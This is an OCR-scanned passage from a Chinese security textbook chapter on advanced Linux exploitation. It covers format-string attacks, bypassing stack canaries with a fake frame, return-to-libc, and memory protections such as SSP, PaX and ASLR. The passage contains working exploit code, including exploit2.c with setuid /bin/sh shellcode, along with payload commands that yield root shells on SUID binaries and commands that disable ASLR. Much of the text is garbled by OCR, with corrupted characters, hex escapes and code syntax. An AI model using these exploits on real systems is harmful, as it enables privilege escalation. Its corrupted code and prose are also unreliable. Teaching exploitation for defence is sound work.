函数 。 这 样 ， 当 printf 执 行 时 ， 程 序 将 暂 信 ， 使 我 们 可 伍 看 正在 发 生 的 事情 。 

接 下 来 ， 当 使 用 参数 asdf 运 行程 序 时 人 @， 程 序 将 如 期 运行 。 程 序 开始 运行 时 ， 
源 点 合 弹 出。 此 后 ， 程 序 在 printf 处 停止 ， 我 们 可 看 到 与 该 函数 相关 的 参数 与 行 写 。 

为 确定 需要 在 何 处 重 定 问 执 行 ， 需 要 在 帆 中 碍 找 已 经 保存 的 EBP 地址 。 为 此 ,将 
使 用 info 命 仿 ， 如 下 所 示 : 

(gdb)@ if 

Stack level 0, frame at Oxbfffee90: 

eip = 0xb7e46930 in printf (printf.c:28); saved eip = 0x80000653 

called by frame at Oxbffffod0 

source language c. 

Arglist at Oxbfffee88, args: format=Oxbfffeeac "asdf" 

Locals at Oxbfffee88, Previous frame's sp is Oxbfffee90 

Saved registersQ: 

eip at Oxbfffee8c 

HE, [BHfQuuühjinfosr4. ifffinfo frame 命 令 的 缩写 形式 。 该 命令 返回 用 
THR SS BRAS a ERI] aa 要 了 解 将 返回 到 的 原始 EIP 地 址 。 该 信息 位 于 
保存 的 寄存 此 区 域 @， 可 在 此 处 看 到 ， 指 网 EPP 的 指针 被 设置 为 0xbfffee8gc。 这 是 要 
重 写 的 地 址 。 该 帆 还 显示 其 他 与 EIP 相 关 的 信息 ， 如 当前 EIP 值 以 及 EIP 的 保存 值 。 这 
与 保存 的 寄存 耸 不 同 , 因为 在 这 些 寄 存 厚 中 直接 存储 值 ， 而 表面 保 存 的 EIP 值 是 在 指 
针 指向 的 位 置 保存 的 。 


2. 综合 运用 


现在 有 了 要 重 写 的 目标 ， 我 们 需要 一 个 新 的 格式 化 字符 串 。 为 此 ， 必 须 再 次 获 
取 shellcode 的 地 址 。 这 里 将 使 用 Aleph One 的 shellcode.c 中 的 shellcode， 将 相应 的 值 保 
存在 环境 变量 SC 中 。 由 于 将 从 非 根 账户 执行 ， 因 此 假设 以 前 面 创 建 的 jogeuser 用 户 的 
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身份 执行 以 下 代码 : 


$ export SC= perl -e 'print 
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\xb0\x17\xcd\x80\ 
xeb\x1lf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x8 
9\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80 
\xe8\xdc\xff\xff \xff/bin/sh™"" 

$ ./getenv SC 

SC is located at Oxbfffff2e 


注意 ， 可 使 用 与 前 面相 同 的 shellcode， 在 本 实验 中 ， 为 灵活 起 见 ， 将 在 开头 填 


元 8 个 NOP 指 令 ， 从 而 可 跳 转 到 NOP 雪 要 的 任何 位 置 。 由 于 有 要 重 与 的 新 地 址 和 新 
SC 位 置 ， 因 此 需要 重新 完成 一 些 计 算 。 


再 按 表 12-2 的 第 一 列 计 复 所 需 的 格式 化 字符 种， 以 便 使 用 shellcode 的 地 址 


0xbfffff2e 重 写 新 的 内 存 地 址 0xbfffee8c。 需 要 完成 其 他 一 些 数学 运算 ， 用 以 更 改 
shellcode 地 址 。 为 此 ， 使 用 表 12-2 中 的 公式 ， 可 得 知 值 应 当 是 0xff2e-0xbfff 的 结果 ， 
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即 16 17$。 将 开头 的 两 个 地 址 普 换 为 要 重 写 的 目标 ， 加 上 2， 实 际 内 存 位 置 为 : 


./fmtstr “printf "Ax8eXAxeeVXxffMAxbfNAx8cWAxeeNxffNxbf"^$.49143x27XShn$. 
16175x%8\Shn 
999999994900000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000 
0000000<TRUNCATED>00000000000000000000000000000000000000000000000 
0000000000000000000000Segmentation fault 


XTC Ex. JAE T REP IA SE, Bl shellcodefiz ELTE n] 4441 A 6 i) 


中 。 默 认 悄 况 下 ， 和 存储 环境 变量 和 其 他 变量 信息 的 堆栈 仅 能 读 写 。 需 要 将 其 改 为 可 
以 该 /与 /执行 。 因 此 ， 我 们 将 采用 坎 骗 方式， 使 用 可 执行 堆栈 重新 编 详 二 进 制 代 但 。 
因此 ， 以 根 用 户 吴 份 重 新 创建 存在 漏洞 的 二 进 制 代码 : 


# gcc -z execstack -o fmtstr fmtstr.c 

# chmod u+s fmtstr 

# su - joeuser 

$ export SC-' perl -e 'print 
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\xb0\x17\xcd\x80\ 
xeb\x1lf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x8 
9\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\ 
xe8\xdc\xff\xff\xff/bin/sh"'~ 

S ./getenv SC 

SC is located at Oxbfffff2e 


然后 运行 以 下 命令 : 


./fmtstr “printf "“\x8e\xee\xff\xbf\x8c\xee\xff\xbf" $.49143x7\ 


Shn%.16175x%8\Shn 
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生成 的 结果 如 下 : 


999999994900000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000 
00000000000 

<TRUNCATED> 
00000000000000000000000000000000000000000000000000000000000000000 
0000000000000000000# 

# id 

uid=0 (root) gid-1000(joeuser) groups-1000(joeuser) 


KOM! 轻松 一 下 。 
还 有 其 他 很 多 有 用 的 位 置 可 供 重 写 。 这 里 列 出 一 些 例子 : 


全 局 偏 移 表 

全 局 函数 指针 
atexit 处 理 程 序 

m 

程序 特定 的 身份 验证 变量 


更 多 可 选 位 置 的 信息 请 参见 “扩展 阅读 ”。 

利用 格式 化 字符 串 的 漏洞 ， 可 重 写 包括 函数 指针 在 内 的 内 存 。 使 用 实验 12-2 以 
及 帧 信息 ， 能 改变 应 用 程序 流程 。 通 过 将 shellcode 作 为 环境 变量 并 确定 其 位 置 ， 我 
们 可 知道 应 用 程序 应 跳 转 到 的 位 置 。 而 使 用 printf 语 句 ， 可 改写 EIP 保 存 的 值 ， 这 样 
在 返回 主 调 函数 时 将 改 为 执行 shellcode。 


12.2 内存 体 护 机 制 


缓冲 区 洪 出 和 推 汶 出 攻击 早已 出 现 ， 而 许多 程序 员 也 已 开发 出 相应 的 内 存 保护 
指 施 以 抵御 这 些 攻 击 。 下 面 将 看 到 ， 有 些 控制 指 施 有 效 ， 而 有 些 则 无 效 。 


12.2.1 


编 详 兹 的 改进 


gcc 编 译 器 从 gcc 4.1 版 本 开始 已 包含 多 项 相关 改进 。 
1. Libsafe 
Libsafe 是 一 个 动态 库 ， 它 为 以 下 人 危险 函数 提供 了 更 安全 的 实现 : 


Strcpy() 

strcat() 

sprintf(). vsprintf() 
getwd() 
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e gets() 

e realpath() 

e fscanf(). scanf(). sscanf() 

Libsafe3b i E H 3x8 f libe RZ RR Y SUA IYI TT] A as IT] 9:39.77 
式 , 从 而 消除 了 大 多 数 基于 堆栈 的 攻击 。 然而 对 于 本 章 所 描述 的 基于 堆 的 漏洞 攻击 ， 
它 并 没有 提供 保护 。 


2. StackShield、StackGuard 和 SSP 


StackShield 是 gcc 编 译 器 的 一 种 蔡 代 品 ， 它 可 在 编译 时 捕获 不 安全 的 操作 。 安 装 
后 ， 用 户 只 需要 用 shieldgcc 蔡 代 gcc 编 译 程序 。 此 外 ， 当 调用 函数 时 ，StackShield 会 
将 所 保存 的 返回 地 址 复制 到 一 个 安全 位 置 ， 然 后 在 函数 返回 时 恢复 该 返回 地 址 。 

StackGuard 由 Crispin Cowan 开 发 ， 它 所 基于 的 系统 在 堆栈 缓冲 区 与 栈 帆 状态 值 
之 则 放置 “检测 仪 (Canary)”。。 如 果 东 个 绥 冲 区 洲 出 试图 香 写 所 保存 的 EIP， 那 么 该 

栈 破 坏 保 护 (Stack Smashing Protection，SSP) 以 前 称 为 ProPolice， 现 在 由 [BM 的 
Hiroaki Etoh 开 发 。SSP 通 过 将 栈 变 量 重 新 排放 ， 改 进 了 StackGuard 基 于 检测 仪 的 保 
护 机 制 ， 从 而 使 得 攻击 变 得 更 困难 。 此 外 ，SSP 还 实现 了 新 的 函数 首部 和 函数 尾部 
代码 。 

下 面 是 以 前 的 函数 首部 代码 : 


080483c4 «main»: 


80483c4: 25 push ‘%ebp 
80483c5: 89 ey mov besp, $ebp 
B0483c7: 83 ec 18 sub S0x18,%esp 


而 新 的 函数 上 有 部 代码 如 下 所 示 : 


080483c4 <main>: 


80483c4: od 4c 24 04 lea 0x4 (Sesp) , secx 
80483c8: 03 e4 £0 and SOxfffffff0,S$esp 
80483cb: ff 71 fc pushl -Ox4($ecx) 
80483ce: 2 push | $ebp 

B0483cf: 89 ey mov sesp, sebp 
80483d1: 31 push %ecx 

80483d2: 03 ec 24 sub $0x24, %esp 


如 图 12-2 所 示 ， 为 ArgC 提 供 一 个 指针 ， 并 在 调用 返回 时 进行 检查 ， 因 此 关键 在 
于 控制 ArgC 指 针 而 不 是 保存 的 Ret。 
由 于 这 种 新 式 函 数 首部 的 出 现 ， 因 此 又 创造 出 一 种 新 式 函 数 尾部 : 


80483ec: 83 c4 24 add SOx24,%esp 
80483ef: 39 pop $ecx 
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80483f0: od pop tebp 
80483f1: Gd 61 fc lea -0x4 (Secx) , %esp 
890483f4: C3 ret 

以 前 的 函数 首部 代码 GCC 4.1 之 后 的 函数 首部 代码 


«— 控制 这 个 指针 
O EBP | 
Ret 指 针 


E 
垫 


x 
«— 控制 这 个 指针 R 


区 


[OH 
NEN 
EF NN 


EF AN 


图 12-2 ”对 比 旧 式 和 新 式 函 数 首部 


BP 
iz 
Hr 
et 


12.22 ”实验 12-4: 绕 过 栈 保 护 

在 第 11 章 末尾 ， 曾 经 讨论 过 如 何 利用 环境 变量 段 末 尾 处 的 内 存 来 实现 小 缓冲 区 
的 溢出 。 既然 有 了 新 的 函数 首部 和 尾部 代码 , 就 需要 插入 一 个 包含 伪造 的 Ret 和 ArgC 
的 假 栈 帧 ， 如 图 12-3 所 示 。 


伪造 的 | 伪造 的 
Ret ArgC 
吕 一 一 一 一 一 


Oxbfffffffa 
| S 
shellcode 程序 NULL 
名 称 | 字 节 
内 存 低地 址 部 分 ; NEN 
Ox11111111  shellcode 地 址 内 存 高 地 址 部 分 ; 
Oxbfffffff 


图 12-3 JH 335 He TR Beh D 


利用 这 种 假 栈 帧 技术 ， 通 过 跳 转 到 伪造 的 ArgC( 它 将 使 用 伪造 的 Ret 地 址 ， 即 
shellcode 的 实际 地 址 )， 从 而 控制 程序 的 执行 。 此 类 攻击 的 源 代码 如 下 : 
//exploit2.c works locally when the vulnerable buffer is small. 
#include <stdlib.h> 
#include <stdio.h> 


#include <unistd.h> 
#include <string.h> 


#define VULN "./smallbuf" 
#define SIZE 26 


f Ck e ke ke ke ke ek ke ee ke ek ke ke eek ke e ek k k k ek ke eek ek kk ek KEK 
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The following format is used 

&shellcode (eip) - must point to the shell code address 
argc - not really using the contents here 

shellcode 

* ./smallbuf 


KKK KK RR ee ke eoe ee e e kk ek ke ee e ke e e ke ec ke ke e e Ke ek e e k / 


并 ox x* x 


char shellcode[] = //Alephl's famous shellcode, see ref. 
"\xff\xff\xff\xff\xff\xff\xff\xff" 
// place holder for &shellcode and argc 
™\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first 
"\xeb\x1lf\x5e\x89\x76\x08\x31\xc0O\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x8O\xe8\xdc\xff\xff\xff/bin/sh"; 
int main(int argc, char **argv) { 
// injection buffer 
char p[SIZE|; 
// put the shellcode in target's envp 
char *env[] = { shellcode, NULL }; 
int *pir, i, addr,addr argc,addr eip; 
// calculate the exact location of the shellcode 
//addr = (int) &shellcode; 
addr = Oxbffffffa - strlen(shellcode) - strlen(VULN); 
addr += 4; 
addr argc = addr; 
addr eip = addr argc + 4; 
fprintf(stderr, "[***] using fake argc address: %#010x\n", 
addr argc); 
fprintf(stderr, "[***] using shellcode address: %#010x\n", 
addr eip); 
// set the address for the modified argc 
shellcode [0] (unsigned char) (addr eip & 0x000000ff); 
shellcode[1] = (unsigned char) ((addr eip & Ox0000ff00)>>8) ; 
shellcode[2] (unsigned char) ((addr eip & 0x00ff0000)22160); 
shellcode[3] = (unsigned char) ((addr eip & Oxff000000) >>24) ; 


/* fill buffer with computed address */ 

/* alignment issues, must offset by two */ 
pl0]-'A'; 
pii 
ptr = (int * )&p[2]; 


for (i = 2; 1 < SIZE; 1 += 4)1{ 
*ptr++ = addr; 
} 
/* this is the address for exploiting with 
* gcc -mpreferred-stack-boundary-2 -o smallbuf smallbuf.c */ 
*ptr = addr eip; 


//call the program with execle, which takes the environment as input 
execle(VULN,"smallbuf",p,NULL, env); 
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exit (1}; 


注意 : 无 论 有 没有 启用 栈 保护 措施 ， 上 面 的 代码 实际 上 都 能 够 生效 。 这 是 
一 种 巧合 ， 因 为 实际 上 ， 重 写 ArgC 指 针 要 比 用 旧式 的 缓冲 区 溢出 攻击 方法 
重 写 保 存 的 Ret 指 针 少 写 了 4 个 字 节 。 


可 按 下 面 的 方法 执行 上 述 代码 : 


# gcc -o exploit2 exploit2.c 
#chmod uts exploit2 
#su joeuser //switch to a normal user (any) 
$ ./exploit2 
[***] using fake argc address: Oxbfffffb7 
[***] using shellcode address: Oxbfffffbb 
99999999)]91:09^9)199r97 

9 

9999997; 


ta 

uid=0 (root) gid-1000(joeuser) groups=1000 (Joeuser) 

从 版 本 4.1 开 始 ，SSP 己 经 被 整合 到 gcc 中 ， 而 且 默 认 局 用 。 可 使 用 
-fno-stack-protector 标 志 将 其 禁用 ， 而 使 用 -fstack-protector-all 标 志 强 制 对 有 所 有 函数 局 
用 栈 保护 o 

可 以 使 用 objdump 工 具 检 栓 是 否 已 经 后 用 了 SSP: 

# gcc -fstack-protector-all test.c -o test 


# objdump -d test | grep -i stack 
000004b0 < stack chk fail@plt>: 


728: e8 83 00 00 00 call ThO < Slack chk fail local 
000007b0 < Steck chk fail local>: 
1bf: e8 ec fc ff ff call 4b0 < stack chk fail@plt> 


请 注意 测试 程序 调用 了 stack_chk_fail@plt 函 数 (编译 在 二 进 制 代码 中 )。 


注意 : 从 本 书 描 述 的 这 些 工具 的 名 称 可 看 出 ， 它 们 都 没有 针对 基于 堆 的 攻 
击 提供 任何 保护 。 


不 可 执行 栈 (基于 gcc) 


gcc 己 经 实现 了 一 种 不 可 执行 栈 (使 用 ELF 标 记 GNU_STACK)。 这 项 功能 (从 版 本 
4.1 开 始 ) 献 认 局 用 ， 可 使 用 -z execstack 标 忘 将 其 茜 用 ， 如 下 所 示 : 
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# gcc -o test test.c && readelf -1 test | grep -1 stack GNU STACK 

0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x10 

# gcc -z execstack -o test test.c ^ 

&& readelf -1 test | grep -1 stack 

GNU STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10 

注意 , 第 1 条 命令 在 ELF 标 记 中 设置 了 RW 标志 , 而 第 2 条 命令 (使 用 了 -z execstack 
标志 ) 在 ELF 标 记 中 设置 了 RWE 标 志 。 这 些 标志 分 别 代 表 读 取 (R)、 写 入 (W) 和 执行 (E)。 

在 本 实验 中 ， 我 们 学 习 了 如 何 确定 栈 傈 护 是 侣 在 工作 以 及 如 何 纸 过 它们 。 使 用 
假 栈 桢 ， 我 们 能 通过 控制 返回 地 址 来 执行 shellcode. 


12.2.3 内核 补丁 和 脚本 


还 有 很 多 保护 机 制 是 以 内 核 级 补丁 和 脚本 的 形式 引入 的 ， 但 这 里 将 只 讨论 其 中 
的 几 种 。 


1. 不 可 执行 内 存 页 ( 栈 和 堆 ) 


在 早期 ， 开 发 人 员 就 明白 程序 的 栈 和 堆 不 应 该 是 可 执行 的 ， 而 用 户 代 码 一 旦 放 
入 内 存 之 后 就 不 应 该 是 可 与 的 。 有 几 种 答 试 达到 这 些 目 标的 探索 。 

Page-eXec(PaX) 补 丁 尝试 通过 改变 内 存 分 由 的 方式 对 内 存 的 栈 和 堆 区 域 提 供 执 
行 控 制 。 通 常 页 表 入 口 (Page Table Entry，PTE) 用 于 跟踪 内 存 页 和 缓存 机 制 ， 称 为 数 
据 和 指令 学 路 转换 缓冲 器 (Translation Look-aside Buffers，TLB)。TLB 存 储 着 最 近 访 
问 的 内 存 页 的 信息 ， 当 访问 内 存 时 CPU 将 首先 检查 这 里 。 如 果 TLB 绥 人 存 没 有 包含 请 
求 的 内 存 页 (缓存 缺失 )， 可 以 使 用 PITE 碍 找 并 访问 内 存 页 。PaX 补 丁 为 TLB 缓 存 实 现 
了 一 组 状态 表 ， 并 维护 内 存 页 是 处 于 读 / 写 模式 还 是 执行 模式 。 当 内 存 页 从 读 写 模式 
转换 成 执行 模式 时 ， 该 补丁 就 会 干预 ， 记 录 日 志 并 终止 发 出 请 求 的 进程 。PaX 有 两 
种 实现 不 可 执行 页 的 方法 。SEGMEXEC 方 法 更 快 且 更 可 靠 , 但 为 了 完成 任务 需要 将 
用 户 空 间 一 分 为 二 。 在 需要 的 时 候 ， 称 为 PAGEEXEC 的 回 退 方法 ，PAGEEXEC 的 速 
度 稍 慢 ， 但 是 可 靠 性 高 。 

Red Hat Enterprise Server 和 Fedora 也 提供 了 一 个 不 可 执行 内 存 页 的 ExecShield 实 
现 方法 。 尽 害 相 当 高 效 ， 但 人 们 已 经 发 现 它 在 特定 条 件 下 和 存在 汤 渔 ， 从 而 允许 数据 
被 执行 。 

2. 地 址 空间 布局 随机 化 (ASLR) 


地 址 衬 间 布局 随机 化 (Address Space Layout Randomization，ASLR) 的 目标 是 将 
下 面 的 内 存 对 象 随机 化 : 

e 可 执行 镜像 

e birkO 管 理 的 堆 
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e JA 
e mmap) E TIE 
e HPR 
e 内 核 栈 


除了 提供 不 可 执行 内 存 页 的 功能 ，PaX 也 完全 实现 了 ASLR 的 上 述 目 标 。 
grsecurity( 一 组 内 核 级 补丁 和 有 脚本) 整合 了 PaX， 并 且 已 经 更 新 到 一 些 Linux 版 本 中 。 
Red Hat 和 Fedora 使 用 位 置 无 天 可 执行 (Position Independent Executable, PIE) 技 术 实 现 
了 ASLR。 虽 然 是 对 相同 的 内 存 区 域 提 供 保护 , 但 这 项 扩 术 提供 的 随机 性 要 小 于 PaX。 
那些 实现 ASLR 技 术 的 系统 通过 将 被 调用 的 libc 函 数 地 址 随机 化 ， 提 供 了 一 种 高 级 保 
护 来 防止 “返回 到 系统 库 函 数 执行 Returm into Libc)” 漏 铀 攻击 。 这 征 通 过 将 mmap() 
调用 随机 化 实现 的 ， 并 使 得 查找 system0 及 其 他 函数 的 地 址 变 得 几乎 不 可 能 。 然 而 ， 
使 用 蛋 力 技术 但 找 像 system0O 这 样 的 函数 调用 还 是 可 能 的 。 

在 基于 Debian 和 Ubuntu 的 系统 中 ， 可 使 用 下 面 的 命令 共用 ASLR: 


# echo 0 > /proc/sys/kernel/randomize va space 
而 在 基于 Red Hat 的 系统 中 ， 则 应 使 用 下 面 的 命令 茶 用 ASLR: 


# echo 1 > /proc/sys/kernel/exec-shield 
# echo 1 > /proc/sys/kernel/exec-shield-randomize 


12.24 ”实验 12-5: Return to Libcim EAE 


Return to Libc 是 一 种 用 来 绕 过 PaX 和 ExecShield 等 不 可 执行 栈 内 存 保护 机 制 | 的 
技术 。 基本 上 , 该 技术 使 用 受 控制 的 EIP 将 执行 控制 权 返 回 到 现 有 的 glibc 函 数 而 不 是 
shellcode。 请 记 住 ，glibc 是 被 所 有 程序 使 用 的 无 处 不 在 的 C 函 数 库 。 这 个 库 包含 诸如 
system0 和 exit0 的 函数 (这 两 个 函数 都 是 有 价值 的 攻击 目标 )。 这 里 特别 令 人 感 兴趣 的 
是 systemO 函 数 ， 它 用 于 在 系统 中 运行 程序 。 我 们 所 要 做 的 仅 是 对 栈 进行 变换 (塑造 
或 更 改 )， 从 而 欺骗 systemO 函 数 去 调用 我 们 所 选择 的 程序 ， 如 /bin/sh。 

为 进行 正确 的 system0 函 数 调 用 ， 需 要 将 栈 变 成 如 图 12-4 所 示 的 样子 。 

所 保存 的 EIP 


图 12-4 BOER 


235 


第 川 部 分 漏洞 攻击 


我 们 将 使 漏洞 缓冲 区 洲 出 ， 并 用 glibc systemo Zac HY H HEVE B E E 27. BU DIA 
的 EIP。 当 存在 漏洞 的 main0 函 数 返 回 时 ， 程 序 将 返回 systemgO 畏 数 ， 因 为 systemgO 函 
数 的 地 址 值 会 从 栈 中 弹出 并 放 入 EIP 牺 和 存 右 以 便 执行 。 此 时 ， 程 序 将 进入 system0 〇 也 
数 并 调用 函数 首部 ， 这 会 在 那个 标记 为 “填充 物 ” 的 位 置 的 上 方 构建 男 一 个 栈 巾 ， 
实际 上 “填充 物 ” 将 成 为 新 栈 想 中 被 保存 的 EIP( 在 system0 函 数 返 回 后 执行 )。 现 在 ， 
和 预期 的 一 样 ，systemO 函 数 的 参数 就 位 于 这 个 新 保存 的 EIP( 在 图 12-4 中 标记 为 “ 填 
充 物 ”) 的 下 方 。 由 于 systemO0 函 数 只 需要 一 个 参数 (一 个 指 同 竺 执行 文件 的 字符 串 指 
针 )， 因 此 我 们 将 在 这 个 位 置 写 入 指 回 字 符 串 ybin/sh" 的 指针 。 在 这 个 示例 中 ， 我 们 
并 不 真正 关心 在 system0O 函 数 执行 后 会 返回 到 哪里 。 如 果 关 心 返 回 值 ， 那 就 需要 确保 
将 “填充 物 ” 符 换 成 一 个 像 exitO0 这 样 有 意义 的 函数 指针 。 


” 注意 : 栈 随机 化 使 得 此 类 攻击 变 得 非常 困难 (但 并 非 不 可 能 )。 基 本 上 ， 需 
要 借助 变 力 方法 来 猜测 所 涉及 的 地 址 ， 但 这 会 极 大 地 降低 成 功 的 概率 。 事 
实 上 ， 不 同系 统 的 随机 化 程度 也 是 不 同 的 ， 而 且 并 非 真 的 随机 ， 

下 和 面 看 一 个 示例 ， 和 有 先 关 财 栈 随机 化 功能 。 

# echo 0 > /proc/sys/kernel/randomize va space 

查看 以 下 漏洞 程序 : 


# cat vuln2.c 


include <string.h> 

/* small buf vuln prog */ 

int main(int argc, char * argv[]){ 
char buffter|7/7]]; 

strcpy (buffer, argv[11]); 

return 0; 


} 


可 以 看 出 ， 这 个 程序 之 所 以 存在 漏洞 ， 是 因为 有 一 个 将 arev[1] 复 制 到 小 缓冲 区 
的 strcpyO 调 有 用。 编译 这 个 漏洞 程序 ， 将 它 设 置 为 SUID， 然 后 切换 回 普通 用 户 账 户 : 

# gcc -mpreferred-stack-boundary-2 -ggdb -o vuln2 vuln2.c 

# chmod uts vuln2 

# ls -1 vuln2 

-rwsr-xr-x 1 root root 8019 Dec 19 19:40 vuln2* 

# su joeuser 

5 

现在 我 们 已 准备 好 构建 Return to Libc 漏 洞 攻击 程序 ， 并 用 它 来 攻击 vuln2 程 序 。 
为 此 我 们 需要 以 下 关键 信息 : 

e plibc 国 数 systemO 的 地 址 
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e 字符 串 "bin/sh" 的 地 址 

实际 上 ，system(O 和 exit0) 这 样 的 函数 会 被 gcc 编 译 器 上 日 动 链接 到 二 进 制 代码 中 。 
为 观察 这 一 事实 ， 在 gdb 中 以 安静 模式 启动 程序 。 在 main0 处 设置 一 个 断 点 ， 然 后 运 
行程 序 。 当 程序 在 断 点 处 挂 起 时 ， 输 出 glibc 函 数 systemO 的 位 置 。 


$ gdb -q vuln2 

Reading symbols from /root/book/vuln2... (no debugging symbols found)...done. 
(gdb) b main 

Breakpoint 1 at Oxb5af 

(gdb) r 

Starting program: /root/book/vuln2 


Breakpoint 1, 0x800005af in main () 
(qdb) p system 
$1 = [«text variable, no debug info») 0xb/e37b30 < libc system» 


(gdb) q 
The program is running. Exit anyway? (y or n) y 


$ 
男 一 种 获取 二 进 制 代码 中 函数 和 字符 串 位 置 的 好 方法 是 使 用 如 下 所 示 的 目 定 义 
程序 来 搜索 二 进 制 : 


S cat search.c 


/* Simple search routine, based on Solar Designer's lpr exploit. */ 
#include «stdio.h-» 

#include <stdlib.h> 

#include «dlfcn.h-» 

#include <signal.h> 

#include <setjmp.h> 

#include <string.h> 


int step; 
jmp buf env; 


void fault() { 
if (step<0) 
longjmp (env, 1); 
else { 
printf("Can't find /bin/sh in libc, use env instead...\n"); 
exit (1); 


} 
int main(int argc, char **argv) { 
void *handle; 


int *sysaddr, *exitaddr; 
long shell; 
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} 


char examp[512]; 
char *args[3]; 
char *envs[1]; 
long *lp; 


o handle=dlopen (NULL, RTLD LOCAL); 


*(void **) (&sysaddr)=dlsym (handle, "system") ; 
sysaddr+=4096; // using pointer math 4096* 4=16384=0x4000=base address 
printf ("system() found at %08x\n",sysaddr) ; 


*(void **) (&exitaddr) =dlsym (handle, "exit") ; 
exitaddr+=4096; // using pointer math 4096*4=16384=0x4000=base address 
printf ("exit() found at %08x\n",exitaddr) ; 


// Now search for /bin/sh using Solar Designer's approach 
if (set jmp (env) ) 


step=1; 
else 
step--1; 


shell=(int) sysaddr; 
signal (SIGSEGV, fault) ; 
do 
@ while (memcmp ( (void *)shell, "/bin/sh", 8)) shell+=step; 
//check for null byte 
@while (! (shell & Oxff) || ! (shell & Oxff00) || ! (shell & Oxf£f0000) 
|| ! (shell & Oxff000000)); 
printf ("\"/bin/sh\" found at %$08x\n", shel1+16384) ; 
// 16384=0x4000=base addr 


上 述 程序 使 用 dlopenO 和 dlsym0 函 数 @ 来 处 理 二 进 制 代码 中 包含 的 对 象 和 符号 。 
一 旦 找到 system0 函 数 , 就 对 内 存 进行 双向 搜索 来 查找 字符 串 "/bin/sh"@。 通过 查找 
可 发 现 Vbinsh" 字 符 串 内 嵌 在 glibc 中 , 这 样 可 阻止 攻击 者 依靠 访问 环境 变量 来 完成 攻 


击 。 最 后 ， 检 查 地 址 值 是 个 包 侣 衬 字 仿 ， 并 输出 位 置信 息 。 也 可 定制 上 面 的 程序 


以 查找 其 他 对 象 和 字符 串 。 接 下 来 编 详 程 序 并 进行 测试 : 


$ gcc -o search -ldl search.c 
S ./search 

system() found at b/e36b30 
exit() found at b7e2a7e0 
"/bin/sh" found at b7£58d28 


DURS f BU TE HH edb Vs vA] 7G BU, rf systemOER ZI] v EL Se RH 
同 。 现 在 使 用 gdb 找 出 漏洞 攻击 的 正确 值 : 


$ gdb -q ./vuln2 
Reading symbols from ./vuln2...done. 


第 12 章 高 级 的 Linux 漏洞 攻击 


(gdb) b main 

Breakpoint 1 at Ox5bl: file vuln2.c, line 5. 
(gdb) r 

Starting program: /root/chl2/vuln2 


Breakpoint 1, main (argc-1, argv-Oxbffff764) at vuln2.c:5 

J strcpy (buffer, argv[1]); 

(gdb) p system 

$1 = {<text variable, no debug info>} 0xb/e37b30 < libc system» 
CO(gdb) p/x 0xb7e37b30 - 0xb7e36b30 

$2 = 0x1000 

(gdb) x/x (0xb7e2a7e0 + 0x1000) 

Oxb7e2b7e0 < GI exit»: Ox0f2204e8 

(gdb) x/s (Oxb7£58d28 + 0x1000) 

Oxb7f59d28: "/bin/sh" 


WWE, ANAS SUI EO Ssearchtk $) f250x1000. AAA HE, JEU 
ERSTER SI. PEGS, exit bin/sh" Fart SEHE. LUE BU 
有 不同 的 原因 在 于 链接 右 组 合 二 进 制 代码 的 方式 。 当 使 用 1dd 来 查看 不 同 的 共计 对象 
在 何 处 连接 到 每 个 文件 时 , 可 以 发 现 , libc 的 连接 位 置 对 两 个 二 进 制 文件 而 言 是 不 同 
的 ， 从 而 寻 致 有 一 定 的 甜 异 (0x1000)。 
$ ldd search 
linux-gate.so.1 (0xb7ffe000) 
libdl.so.2 => /1ib/i386-linux-gnu/libdl.so.2 (0xb7fd1000) 
@Olibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e1a000) 
/lib/ld-linux.so.2 (0x80000000) 

$ ldd vuln2 
Qiibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e1f000) 
/lib/ld-linux.so.2 (0x80000000) 

使 用 1dd 可 以 看 到 ， 对 于 两 个 二 进 制 文件 而 言 ，libc 合 和 的 地 址 是 不 同 的 。 通 
过 gdb 和 一 些 算术 运算 , 现在 我 们 有 了 利用 Retum to Libc 来 攻击 存在 漏洞 的 程序 所 需 
要 的 一 切 。 组 合 在 一 起 的 效果 如 下 ; 

2 -/vuln2 “perl -e "print "A"x15 . 

"Nx30Nx7bNxo3Nxb7BBBBNAx28Nx9dNxf5NXxb7" ' ^ 

# id 

uid-1000(joeuser) gid=1000 (joeuser) euid-0 (root) groups=1000 (joeuser) 

# exit 

Segmentation fault 

注意 , 我 们 获得 了 一 个 EUID 根 用 户 级 shell, 而 当 从 该 shell 退 出 时 出 现 了 有 段 错误 。 
为 什么 会 发 生 这 种 情况 呢 ? 之 所 以 在 离开 EUID 根 用 户 级 shell 时 程序 朋 尝 , 是 因为 我 
们 提供 的 填充 物 (0x42424242) 成 为 将 在 system0 函 数 之 后 执行 的 EIP。 因 此 ， 在 程序 
结束 时 出 现 朋 尝 也 是 符合 预期 的 。 为 避免 出 现 这 种 情况 ， 只 需要 在 填充 物 处 写 入 指 
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辣 exit0 函 数 的 指针 即 可 : 

S$ ./vuln2 "perl -e 'print "A"x15 . 

"Nx30NMXx7bNxe3Nxb7NxeONxb7NxXe2Nxb7NxX28Mx9dMxf5NMxb7"'^ 

# id 

uid=1000 (jJoeuser) gid=1000 (joeuser) euid-0 (root) groups=1000 (jJoeuser) 

# exit 

a! 现在 我 们 有 了 一 个 包含 有 效用 户 ID 的 根 用 户 级 shell。 

使 用 Retum to Libc(ret2libc), 就 能 将 程序 流 导向 到 二 进 制 代码 的 其 他 部 分 。 通 过 
